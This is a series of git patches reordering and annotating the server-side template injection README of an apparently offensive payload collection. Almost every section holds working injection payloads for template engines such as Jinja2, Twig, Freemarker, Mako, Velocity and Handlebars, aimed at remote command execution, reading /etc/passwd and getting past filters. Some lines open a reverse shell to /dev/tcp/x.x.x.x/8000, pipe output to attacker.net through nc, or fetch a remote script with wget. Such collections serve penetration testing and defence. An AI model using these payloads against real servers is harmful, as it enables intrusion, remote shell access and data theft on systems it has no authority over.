From 5d846e9b8dd3b862faf5afaf3a033d35f315661f Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:28:29 +0200 Subject: [PATCH 1/6] Update README.md --- Server Side Template Injection/README.md | 54 ++++++++++++------------ 1 file changed, 28 insertions(+), 26 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 858eab6..9e0bcef 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -6,32 +6,21 @@ * [Tools](#tools) * [Methodology](#methodology) -* [Ruby](#ruby) - * [Basic injections](#ruby---basic-injections) - * [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) - * [List files and directories](#ruby---list-files-and-directories) +* [ASP.NET Razor](#aspnet-razor) + * [Basic injection](#aspnet-razor---basic-injection) + * [Command execution](#aspnet-razor---command-execution) +* [Expression Language EL](#expression-language-el) + * [Basic injection](#expression-language-el---basic-injection) + * [Code execution](#expression-language-el---code-execution) +* [Freemarker](#freemarker) + * [Basic injection](#freemarker---basic-injection) + * [Code execution](#freemarker---code-execution) +* [Handlebars](#handlebars) +* [Jade / Codepen](#jade--codepen) * [Java](#java) * [Basic injection](#java---basic-injection) * [Retrieve the system’s environment variables](#java---retrieve-the-systems-environment-variables) * [Retrieve /etc/passwd](#java---retrieve-etcpasswd) -* [Expression Language EL](#expression-language-el) - * [Basic injection](#expression-language-el---basic-injection) - * [Code execution](#expression-language-el---code-execution) -* [Twig](#twig) - * [Basic injection](#twig---basic-injection) - * [Template format](#twig---template-format) - * [Arbitrary File Reading](#twig---arbitrary-file-reading) - * [Code execution](#twig---code-execution) -* [Smarty](#smarty) -* [Freemarker](#freemarker) - * [Basic injection](#freemarker---basic-injection) - * [Code execution](#freemarker---code-execution) -* [Pebble](#pebble) - * [Basic injection](#pebble---basic-injection) - * [Code execution](#pebble---code-execution) -* [Jade / Codepen](#jade--codepen) -* [Velocity](#velocity) -* [Mako](#mako) * [Jinja2](#jinja2) * [Basic injection](#jinja2---basic-injection) * [Template format](#jinja2---template-format) @@ -45,11 +34,22 @@ * [Jinjava](#jinjava) * [Basic injection](#jinjava---basic-injection) * [Command execution](#jinjava---command-execution) -* [Handlebars](#handlebars) -* [ASP.NET Razor](#aspnet-razor) - * [Basic injection](#aspnet-razor---basic-injection) - * [Command execution](#aspnet-razor---command-execution) * [Lessjs](#lessjs) +* [Mako](#mako) +* [Pebble](#pebble) + * [Basic injection](#pebble---basic-injection) + * [Code execution](#pebble---code-execution) +* [Ruby](#ruby) + * [Basic injections](#ruby---basic-injections) + * [Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) + * [List files and directories](#ruby---list-files-and-directories) +* [Smarty](#smarty) +* [Twig](#twig) + * [Basic injection](#twig---basic-injection) + * [Template format](#twig---template-format) + * [Arbitrary File Reading](#twig---arbitrary-file-reading) + * [Code execution](#twig---code-execution) +* [Velocity](#velocity) * [References](#references) ## Tools @@ -67,6 +67,8 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true) +--- + ## Ruby ### Ruby - Basic injections From f44fae68b50c41519e72fc09691258c74428feb7 Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:30:35 +0200 Subject: [PATCH 2/6] Update README.md --- Server Side Template Injection/README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 9e0bcef..c8ffa04 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -653,6 +653,8 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ### ASP.NET Razor - Basic injection +https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c + ```powershell @(1+2) ``` @@ -665,6 +667,8 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 } ``` +--- + ## Lessjs ### Lessjs - SSRF / LFI @@ -717,6 +721,8 @@ registerPlugin({ }) ``` +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 030e53658612f04c366a2f92d3a45a739f434d9f Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:37:05 +0200 Subject: [PATCH 3/6] Update README.md --- Server Side Template Injection/README.md | 403 ++++++++++++----------- 1 file changed, 210 insertions(+), 193 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index c8ffa04..e238b0e 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -69,85 +69,32 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment --- -## Ruby +## ASP.NET Razor -### Ruby - Basic injections +### ASP.NET Razor - Basic injection -ERB: - -```ruby -<%= 7 * 7 %> -``` - -Slim: - -```ruby -#{ 7 * 7 } -``` - -### Ruby - Retrieve /etc/passwd - -```ruby -<%= File.open('/etc/passwd').read %> -``` - -### Ruby - List files and directories - -```ruby -<%= Dir.entries('/') %> -``` - -### Ruby - Code execution - -Execute code using SSTI for ERB engine. - -```ruby -<%= system('cat /etc/passwd') %> -<%= `ls /` %> -<%= IO.popen('ls /').readlines() %> -<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> -<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> -``` - - -Execute code using SSTI for Slim engine. +https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c ```powershell -#{ %x|env| } +@(1+2) ``` -## Java +### ASP.NET Razor - Command execution -### Java - Basic injection - -```java -${7*7} -${{7*7}} -${class.getClassLoader()} -${class.getResource("").getPath()} -${class.getResource("../../../../../index.htm").getContent()} +```csharp +@{ + // C# code +} ``` -### Java - Retrieve the system’s environment variables - -```java -${T(java.lang.System).getenv()} -``` - -### Java - Retrieve /etc/passwd - -```java -${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} - -${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} -``` +--- ## Expression Language EL ### Expression Language EL - Basic injection ```java -${1+1} +${1+1} #{1+1} ``` @@ -163,7 +110,6 @@ ${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".g ### Expression Language EL - Code Execution - ```java // Common RCE payloads ''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec() @@ -192,65 +138,7 @@ ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().g ${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} ``` - -## Twig - -### Twig - Basic injection - -```python -{{7*7}} -{{7*'7'}} would result in 49 -{{dump(app)}} -{{app.request.server.all|join(',')}} -``` - -### Twig - Template format - -```python -$output = $twig > render ( - 'Dear' . $_GET['custom_greeting'], - array("first_name" => $user.first_name) -); - -$output = $twig > render ( - "Dear {first_name}", - array("first_name" => $user.first_name) -); -``` - -### Twig - Arbitrary File Reading - -```python -"{{'/etc/passwd'|file_excerpt(1,30)}}"@ -``` - -### Twig - Code execution - -```python -{{self}} -{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} -{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} -{{['id']|filter('system')}} -{{['cat\x20/etc/passwd']|filter('system')}} -{{['cat$IFS/etc/passwd']|filter('system')}} -``` - -Example with an email passing FILTER_VALIDATE_EMAIL PHP. - -```powershell -POST /subscribe?0=cat+/etc/passwd HTTP/1.1 -email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld -``` - -## Smarty - -```python -{$smarty.version} -{php}echo `id`;{/php} //deprecated in smarty v3 -{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} -{system('ls')} // compatible v3 -{system('cat index.php')} // compatible v3 -``` +--- ## Freemarker @@ -280,35 +168,65 @@ ${"freemarker.template.utility.Execute"?new()("id")} ${dwf.newInstance(ec,null)("id")} ``` -## Pebble +--- -### Pebble - Basic injection +## Handlebars -```java -{{ someString.toUPPERCASE() }} +### Handlebars - Command Execution + +```handlebars +{{#with "s" as |string|}} + {{#with "e"}} + {{#with split as |conslist|}} + {{this.pop}} + {{this.push (lookup string.sub "constructor")}} + {{this.pop}} + {{#with string.split as |codelist|}} + {{this.pop}} + {{this.push "return require('child_process').execSync('ls -la');"}} + {{this.pop}} + {{#each conslist}} + {{#with (string.sub.apply 0 codelist)}} + {{this}} + {{/with}} + {{/each}} + {{/with}} + {{/with}} + {{/with}} +{{/with}} ``` -### Pebble - Code execution +--- -Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`. +## Java -New version of Pebble : +### Java - Basic injection ```java -{% set cmd = 'id' %} -{% set bytes = (1).TYPE - .forName('java.lang.Runtime') - .methods[6] - .invoke(null,null) - .exec(cmd) - .inputStream - .readAllBytes() %} -{{ (1).TYPE - .forName('java.lang.String') - .constructors[0] - .newInstance(([bytes]).toArray()) }} +${7*7} +${{7*7}} +${class.getClassLoader()} +${class.getResource("").getPath()} +${class.getResource("../../../../../index.htm").getContent()} ``` +### Java - Retrieve the system’s environment variables + +```java +${T(java.lang.System).getenv()} +``` + +### Java - Retrieve /etc/passwd + +```java +${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} + +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} +``` + +--- + + ## Jade / Codepen ```python @@ -350,7 +268,7 @@ ${x} ### Direct access to os from TemplateNamespace: -Any of these payloads allows direct access to the `os` module +Any of these payloads allows direct access to the `os` module ```python ${self.module.cache.util.os.system("id")} @@ -549,13 +467,13 @@ In another GET parameter include a variable named "input" that contains the comm ```python # evil config -{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # load the evil config {{ config.from_pyfile('/tmp/evilconfig.cfg') }} # connect to evil host -{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} +{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` @@ -608,7 +526,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) -### Jinjava - Command execution +### Jinjava - Command execution Fixed by https://github.com/HubSpot/jinjava/pull/230 @@ -619,54 +537,9 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} - {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` -## Handlebars - -### Handlebars - Command Execution - -```handlebars -{{#with "s" as |string|}} - {{#with "e"}} - {{#with split as |conslist|}} - {{this.pop}} - {{this.push (lookup string.sub "constructor")}} - {{this.pop}} - {{#with string.split as |codelist|}} - {{this.pop}} - {{this.push "return require('child_process').execSync('ls -la');"}} - {{this.pop}} - {{#each conslist}} - {{#with (string.sub.apply 0 codelist)}} - {{this}} - {{/with}} - {{/each}} - {{/with}} - {{/with}} - {{/with}} -{{/with}} -``` - -## ASP.NET Razor - -### ASP.NET Razor - Basic injection - -https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c - -```powershell -@(1+2) -``` - -### ASP.NET Razor - Command execution - -```csharp -@{ - // C# code -} -``` - --- ## Lessjs @@ -706,7 +579,7 @@ version 2 example RCE plugin: ```javascript functions.add('cmd', function(val) { return `"${global.process.mainModule.require('child_process').execSync(val.value)}"`; -}); +}); ``` version 3 and above example RCE plugin @@ -723,6 +596,150 @@ registerPlugin({ --- +## Pebble + +### Pebble - Basic injection + +```java +{{ someString.toUPPERCASE() }} +``` + +### Pebble - Code execution + +Old version of Pebble ( < version 3.0.9): `{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}`. + +New version of Pebble : + +```java +{% set cmd = 'id' %} +{% set bytes = (1).TYPE + .forName('java.lang.Runtime') + .methods[6] + .invoke(null,null) + .exec(cmd) + .inputStream + .readAllBytes() %} +{{ (1).TYPE + .forName('java.lang.String') + .constructors[0] + .newInstance(([bytes]).toArray()) }} +``` + +--- + +## Ruby + +### Ruby - Basic injections + +ERB: + +```ruby +<%= 7 * 7 %> +``` + +Slim: + +```ruby +#{ 7 * 7 } +``` + +### Ruby - Retrieve /etc/passwd + +```ruby +<%= File.open('/etc/passwd').read %> +``` + +### Ruby - List files and directories + +```ruby +<%= Dir.entries('/') %> +``` + +### Ruby - Code execution + +Execute code using SSTI for ERB engine. + +```ruby +<%= system('cat /etc/passwd') %> +<%= `ls /` %> +<%= IO.popen('ls /').readlines() %> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> +``` + + +Execute code using SSTI for Slim engine. + +```powershell +#{ %x|env| } +``` + + +--- + +## Smarty + +```python +{$smarty.version} +{php}echo `id`;{/php} //deprecated in smarty v3 +{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} +{system('ls')} // compatible v3 +{system('cat index.php')} // compatible v3 +``` + +--- + +## Twig + +### Twig - Basic injection + +```python +{{7*7}} +{{7*'7'}} would result in 49 +{{dump(app)}} +{{app.request.server.all|join(',')}} +``` + +### Twig - Template format + +```python +$output = $twig > render ( + 'Dear' . $_GET['custom_greeting'], + array("first_name" => $user.first_name) +); + +$output = $twig > render ( + "Dear {first_name}", + array("first_name" => $user.first_name) +); +``` + +### Twig - Arbitrary File Reading + +```python +"{{'/etc/passwd'|file_excerpt(1,30)}}"@ +``` + +### Twig - Code execution + +```python +{{self}} +{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} +{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +``` + +Example with an email passing FILTER_VALIDATE_EMAIL PHP. + +```powershell +POST /subscribe?0=cat+/etc/passwd HTTP/1.1 +email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld +``` + +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 58d88e5293de6e2fd706621cfd959e963cc720ed Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:48:51 +0200 Subject: [PATCH 4/6] Update README.md --- Server Side Template Injection/README.md | 249 +++++++++++++---------- 1 file changed, 136 insertions(+), 113 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index e238b0e..fe8a636 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -198,6 +198,21 @@ ${dwf.newInstance(ec,null)("id")} --- +## Jade / Codepen + +```python +- var x = root.process +- x = x.mainModule.require +- x = x('child_process') += x.exec('id | nc attacker.net 80') +``` + +```javascript +#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} +``` + +--- + ## Java ### Java - Basic injection @@ -226,116 +241,6 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex --- - -## Jade / Codepen - -```python -- var x = root.process -- x = x.mainModule.require -- x = x('child_process') -= x.exec('id | nc attacker.net 80') -``` - -```javascript -#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} -``` - -## Velocity - -```python -#set($str=$class.inspect("java.lang.String").type) -#set($chr=$class.inspect("java.lang.Character").type) -#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) -$ex.waitFor() -#set($out=$ex.getInputStream()) -#foreach($i in [1..$out.available()]) -$str.valueOf($chr.toChars($out.read())) -#end -``` - -## Mako - -[Official website](https://www.makotemplates.org/) -> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. - -```python -<% -import os -x=os.popen('id').read() -%> -${x} -``` - -### Direct access to os from TemplateNamespace: - -Any of these payloads allows direct access to the `os` module - -```python -${self.module.cache.util.os.system("id")} -${self.module.runtime.util.os.system("id")} -${self.template.module.cache.util.os.system("id")} -${self.module.cache.compat.inspect.os.system("id")} -${self.__init__.__globals__['util'].os.system('id')} -${self.template.module.runtime.util.os.system("id")} -${self.module.filters.compat.inspect.os.system("id")} -${self.module.runtime.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.util.os.system("id")} -${self.template.__init__.__globals__['os'].system('id')} -${self.module.cache.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.util.os.system("id")} -${self.template.module.cache.compat.inspect.os.system("id")} -${self.module.cache.compat.inspect.linecache.os.system("id")} -${self.template._mmarker.module.runtime.util.os.system("id")} -${self.attr._NSAttr__parent.module.cache.util.os.system("id")} -${self.template.module.filters.compat.inspect.os.system("id")} -${self.template.module.runtime.compat.inspect.os.system("id")} -${self.module.filters.compat.inspect.linecache.os.system("id")} -${self.module.runtime.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.exceptions.util.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} -${self.context._with_template.module.cache.util.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.template.module.cache.util.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.util.os.system("id")} -${self.module.cache.util.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.util.compat.inspect.os.system("id")} -${self.module.runtime.util.compat.inspect.linecache.os.system("id")} -${self.module.runtime.exceptions.traceback.linecache.os.system("id")} -${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} -${self.template._mmarker.module.cache.compat.inspect.os.system("id")} -${self.template.module.cache.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} -${self.template._mmarker.module.filters.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} -${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} -${self.template.module.filters.compat.inspect.linecache.os.system("id")} -${self.template.module.runtime.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} -${self.context._with_template._mmarker.module.cache.util.os.system("id")} -${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.cache.compat.inspect.os.system("id")} -${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} -${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} -${self.context._with_template._mmarker.module.runtime.util.os.system("id")} -${self.context._with_template.module.filters.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.compat.inspect.os.system("id")} -${self.context._with_template.module.runtime.exceptions.util.os.system("id")} -${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} -``` - -PoC : - -```python ->>> print(Template("${self.module.cache.util.os}").render()) - -``` - -Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - ## Jinja2 [Official website](https://jinja.palletsprojects.com/) @@ -476,7 +381,6 @@ In another GET parameter include a variable named "input" that contains the comm {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }} ``` - ### Jinja2 - Filter bypass ```python @@ -515,8 +419,13 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} ``` +--- + ## Jinjava +[Official website](https://github.com/HubSpot/jinjava) +> Java-based template engine based on django template syntax, adapted to render jinja templates (at least the subset of jinja in use in HubSpot content). + ### Jinjava - Basic injection ```python @@ -544,6 +453,9 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 ## Lessjs +[Official website](https://lesscss.org/) +> Less (which stands for Leaner Style Sheets) is a backwards-compatible language extension for CSS. This is the official documentation for Less, the language and Less.js, the JavaScript tool that converts your Less styles to CSS styles. + ### Lessjs - SSRF / LFI ```less @@ -594,10 +506,99 @@ registerPlugin({ }) ``` +--- + +## Mako + +[Official website](https://www.makotemplates.org/) +> Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. + +```python +<% +import os +x=os.popen('id').read() +%> +${x} +``` + +### Direct access to os from TemplateNamespace: + +Any of these payloads allows direct access to the `os` module + +```python +${self.module.cache.util.os.system("id")} +${self.module.runtime.util.os.system("id")} +${self.template.module.cache.util.os.system("id")} +${self.module.cache.compat.inspect.os.system("id")} +${self.__init__.__globals__['util'].os.system('id')} +${self.template.module.runtime.util.os.system("id")} +${self.module.filters.compat.inspect.os.system("id")} +${self.module.runtime.compat.inspect.os.system("id")} +${self.module.runtime.exceptions.util.os.system("id")} +${self.template.__init__.__globals__['os'].system('id')} +${self.module.cache.util.compat.inspect.os.system("id")} +${self.module.runtime.util.compat.inspect.os.system("id")} +${self.template._mmarker.module.cache.util.os.system("id")} +${self.template.module.cache.compat.inspect.os.system("id")} +${self.module.cache.compat.inspect.linecache.os.system("id")} +${self.template._mmarker.module.runtime.util.os.system("id")} +${self.attr._NSAttr__parent.module.cache.util.os.system("id")} +${self.template.module.filters.compat.inspect.os.system("id")} +${self.template.module.runtime.compat.inspect.os.system("id")} +${self.module.filters.compat.inspect.linecache.os.system("id")} +${self.module.runtime.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.exceptions.util.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.util.os.system("id")} +${self.context._with_template.module.cache.util.os.system("id")} +${self.module.runtime.exceptions.compat.inspect.os.system("id")} +${self.template.module.cache.util.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.util.os.system("id")} +${self.module.cache.util.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.util.compat.inspect.os.system("id")} +${self.module.runtime.util.compat.inspect.linecache.os.system("id")} +${self.module.runtime.exceptions.traceback.linecache.os.system("id")} +${self.module.runtime.exceptions.util.compat.inspect.os.system("id")} +${self.template._mmarker.module.cache.compat.inspect.os.system("id")} +${self.template.module.cache.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")} +${self.template._mmarker.module.filters.compat.inspect.os.system("id")} +${self.template._mmarker.module.runtime.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")} +${self.template._mmarker.module.runtime.exceptions.util.os.system("id")} +${self.template.module.filters.compat.inspect.linecache.os.system("id")} +${self.template.module.runtime.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")} +${self.context._with_template._mmarker.module.cache.util.os.system("id")} +${self.template.module.runtime.exceptions.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")} +${self.context._with_template.module.cache.compat.inspect.os.system("id")} +${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")} +${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")} +${self.context._with_template._mmarker.module.runtime.util.os.system("id")} +${self.context._with_template.module.filters.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.compat.inspect.os.system("id")} +${self.context._with_template.module.runtime.exceptions.util.os.system("id")} +${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")} +``` + +PoC : + +```python +>>> print(Template("${self.module.cache.util.os}").render()) + +``` + +Source [@podalirius_](https://twitter.com/podalirius_) : [https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) + + --- ## Pebble +[Official website](https://pebbletemplates.io/) +> Pebble is a Java templating engine inspired by [Twig](./#twig) and similar to the Python [Jinja](./#jinja2) Template Engine syntax. It features templates inheritance and easy-to-read syntax, ships with built-in autoescaping for security, and includes integrated support for internationalization. + ### Pebble - Basic injection ```java @@ -667,18 +668,19 @@ Execute code using SSTI for ERB engine. <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> ``` - Execute code using SSTI for Slim engine. ```powershell #{ %x|env| } ``` - --- ## Smarty +[Official website](https://www.smarty.net/docs/en/) +> Smarty is a template engine for PHP. + ```python {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 @@ -691,6 +693,9 @@ Execute code using SSTI for Slim engine. ## Twig +[Official website](https://twig.symfony.com/) +> Twig is a modern template engine for PHP. + ### Twig - Basic injection ```python @@ -740,6 +745,24 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld --- +## Velocity + +[Official website](https://velocity.apache.org/engine/1.7/user-guide.html) +> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code. + +```python +#set($str=$class.inspect("java.lang.String").type) +#set($chr=$class.inspect("java.lang.Character").type) +#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) +$ex.waitFor() +#set($out=$ex.getInputStream()) +#foreach($i in [1..$out.available()]) +$str.valueOf($chr.toChars($out.read())) +#end +``` + +--- + ## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) From 6d48f28d99e9af1b58b032bab4ec485afe8de22b Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:55:23 +0200 Subject: [PATCH 5/6] Update README.md --- Server Side Template Injection/README.md | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index fe8a636..add2466 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -71,9 +71,10 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ## ASP.NET Razor -### ASP.NET Razor - Basic injection +[Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c) +> Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. -https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c +### 